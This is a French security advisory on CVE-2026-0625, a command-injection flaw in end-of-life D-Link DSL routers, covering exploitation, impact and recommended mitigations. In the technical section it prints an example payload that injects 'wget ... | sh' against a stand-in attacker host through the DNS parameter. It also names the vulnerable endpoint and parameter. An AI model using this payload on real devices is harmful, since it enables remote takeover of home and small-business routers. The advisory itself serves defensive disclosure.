CVE-2026-0625 : RCE D-Link DSL EoL exploité (CVSS 9.3)

Les faits

CVE-2026-0625 est une vulnérabilité d'injection de commandes système non authentifiée affectant le CGI dnscfg.cgi présent sur une large gamme de routeurs DSL et de NAS D-Link en fin de vie. Le score CVSS v3.1 atteint 9.3 (vecteur AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H avec scope changed), reflétant une exploitation distante triviale, sans authentification ni interaction utilisateur, donnant à l'attaquant un contrôle total du routeur. Le périmètre dépasse l'appareil compromis lui-même puisqu'un attaquant peut pivoter pour intercepter, rediriger ou empoisonner le trafic DNS de tout le réseau local situé derrière le routeur.

La faille a été décrite publiquement par VulnCheck dans un advisory daté du 16 décembre 2025, après identification d'une « bibliothèque CGI compromise » embarquée dans plusieurs firmwares D-Link de l'époque 2016-2019. L'endpoint vulnérable est dnscfg.cgi, qui prend en paramètre les serveurs DNS à configurer pour le routeur. La vulnérabilité, classée CWE-78 (improper neutralization of special elements used in an OS command), se résume à un simple défaut d'assainissement : le paramètre DNS est concaténé directement dans une commande shell exécutée par le routeur. Une charge utile de la forme « 8.8.8.8 ; wget http://attaquant.example/x.sh -O- | sh » suffit à obtenir une exécution de code arbitraire avec les privilèges du daemon HTTP du routeur, qui sur la plupart de ces équipements tourne en root.

La Shadowserver Foundation a documenté les premières tentatives d'exploitation in-the-wild dès le 27 novembre 2025, soit plusieurs semaines avant la publication officielle de l'advisory. Les campagnes observées ciblent activement les firmwares des modèles DSL-2740R, DSL-2640B, DSL-2780B et DSL-526B fabriqués entre 2016 et 2019. Selon les données VulnCheck publiées en avril 2026, les exploitations se sont accélérées au premier trimestre 2026, avec un pic observé fin avril coïncidant avec la diffusion d'un PoC fonctionnel sur GitHub. À ce jour (5 mai 2026), plus de 60 000 routeurs D-Link exposés répondent encore aux requêtes sur dnscfg.cgi selon les scans Censys.

L'aspect particulièrement préoccupant de cette vulnérabilité tient à son caractère définitivement non corrigeable. D-Link a confirmé via son advisory SAP10488 que tous les modèles concernés ont atteint leur fin de vie en 2020 et qu'aucun firmware correctif ne sera développé. Le vendeur recommande explicitement le remplacement matériel des appareils. Pour les utilisateurs particuliers et les très petites entreprises (le segment principal de ces routeurs DSL), cette absence de patch laisse durablement la porte ouverte. Le scénario s'apparente à celui de CVE-2024-3273 (D-Link DNS NAS, exploité par Mirai en 2024) ou de CVE-2017-3193 (DSL-2750B), avec des botnets qui continuent d'engranger des bots pendant des années après l'EoL.

Le détail technique de la chaîne d'exploitation est désormais public. L'attaquant émet une requête HTTP POST vers /cgi-bin/dnscfg.cgi avec un body contenant un paramètre « dns_server_1 » dont la valeur intègre des métacaractères shell. Le binaire CGI, écrit en C avec une routine d'appel system() ou popen() sans escapement, exécute la commande composée. Aucune authentification n'est requise : l'interface d'administration de ces routeurs accepte les requêtes vers certains CGI sans cookie de session, fonctionnement hérité d'une architecture conçue à l'origine pour permettre la configuration initiale via un script local. Plusieurs de ces routeurs exposent même leur interface d'administration sur le port WAN par défaut, ce qui les rend joignables directement depuis Internet.

Les usages observés des routeurs compromis sont multiples. Les chercheurs de Field Effect, Cybernews et Security Affairs ont documenté trois grandes catégories d'abus. Premièrement, le détournement DNS (DNSChanger) : l'attaquant reconfigure le routeur pour utiliser des serveurs DNS hostiles, redirigeant le trafic des victimes vers des sites de phishing ou des pages publicitaires monétisées. Deuxièmement, l'intégration à des botnets DDoS dérivés de Mirai (en particulier les variants Mozi et Aisuru observés au T1 2026), les routeurs servant de relais pour saturer des cibles tierces. Troisièmement, l'utilisation comme proxies résidentiels vendus dans des marketplaces clandestines, exploitant les adresses IP « propres » de ces lignes domestiques pour contourner des contrôles anti-fraude.

Au plan stratégique, CVE-2026-0625 illustre l'angle mort persistant des équipements grand public et SOHO en fin de vie. Les statistiques de pénétration des routeurs D-Link DSL en France, particulièrement dans le sud de l'Europe et au Maghreb, restent significatives : ces équipements ont été massivement distribués par des opérateurs tiers entre 2016 et 2019, et beaucoup sont toujours en service chez des particuliers, des indépendants ou de petites structures qui n'ont pas conscience du cycle de vie de leur matériel.

L'absence de patch impose une posture défensive radicale : il n'existe pas de correctif, seulement des contournements (désactivation de l'accès distant, segmentation réseau, ou remplacement). Les CERT nationaux européens (CERT-FR, CERT-NL, CERT-EU) n'ont pas publié de bulletin spécifique à cette CVE, mais le CISA américain a inscrit CVE-2026-0625 dans son catalogue KEV (Known Exploited Vulnerabilities) en avril 2026, imposant aux agences fédérales le remplacement des équipements concernés.

Impact et exposition

L'exposition se mesure en deux dimensions : individuelle (un routeur compromis donne à l'attaquant un poste d'observation et de manipulation sur tout le réseau domestique ou de bureau) et systémique (les dizaines de milliers de routeurs vulnérables compromis collectivement servent à alimenter des infrastructures malveillantes — botnets DDoS, réseaux de proxies, plateformes de phishing). Pour une PME utilisant un de ces équipements, le risque concret inclut l'interception de credentials web non chiffrés, le détournement de mises à jour logicielles non signées, l'empoisonnement des résolutions DNS pour conduire des attaques de phishing ciblées et la latéralisation potentielle vers des serveurs internes.

Les conditions d'exploitation sont triviales : un simple scan Internet suffit à identifier les appareils vulnérables (signature HTTP characteristic du serveur D-Link, port 80 ou 8080 exposés, présence de /cgi-bin/dnscfg.cgi). L'exploitation peut se massifier en quelques minutes via des outils standards (masscan + curl + payload). Aucun bypass de sécurité n'est nécessaire : ni authentification, ni stack canary, ni ASLR. Le code est exécuté directement par l'interpréteur shell du firmware, ce qui rend la persistance triviale (modification de scripts d'init, ajout de tâches cron, installation de webshells).

L'exposition est confirmée active : Shadowserver compte plus de 60 000 IPs exploitées sur les six derniers mois, et la tendance est à la hausse depuis la publication du PoC fin avril 2026. Les FAI européens devraient considérer un blocage proactif des paquets ciblant /cgi-bin/dnscfg.cgi sur les blocs résidentiels, mesure déjà appliquée par certains opérateurs (notamment KPN et Free) selon des sources industrielles.

Pour les organisations gérant des parcs distribués (cabinets comptables multi-sites, restaurants en chaîne, associations avec antennes locales), l'audit doit absolument couvrir les équipements de connectivité Internet hérités, généralement non inventoriés et oubliés des programmes de gestion d'actifs.

Recommandations immédiates

• Identifier les routeurs D-Link DSL et DIR concernés (modèles DSL-500, 500G, 502G, 526B, 2640B, 2640T, 2740R, 2780B, DIR-600/608/610/611/615/905L) ainsi que les NAS DNS-320/325/345, en s'appuyant sur l'inventaire matériel et l'advisory D-Link SAP10488.
• Remplacer immédiatement ces équipements par du matériel supporté (routeurs MikroTik, Ubiquiti EdgeRouter, OpenWrt sur routeur compatible, ou box opérateur récente).
• Si le remplacement immédiat est impossible, désactiver toute administration WAN (interface web exposée sur Internet), changer les mots de passe par défaut, et placer le routeur derrière un pare-feu maîtrisé qui bloque l'accès au port 80/8080 depuis l'extérieur.
• Vérifier les paramètres DNS configurés sur le routeur : la présence de serveurs DNS inhabituels (différents de ceux du FAI ou de DNS publics légitimes type 1.1.1.1, 8.8.8.8, 9.9.9.9) constitue un indicateur de compromission.
• Inspecter les processus en cours d'exécution sur le routeur si l'accès SSH/Telnet est disponible (ps, netstat) à la recherche de binaires inconnus ou de connexions sortantes vers des IPs suspectes.
• Surveiller le trafic réseau interne pour détecter des résolutions DNS anormales ou des redirections vers des domaines de phishing.
• Auditer les autres équipements EoL du parc : la même problématique touche fréquemment les caméras IP, NAS et imprimantes oubliés.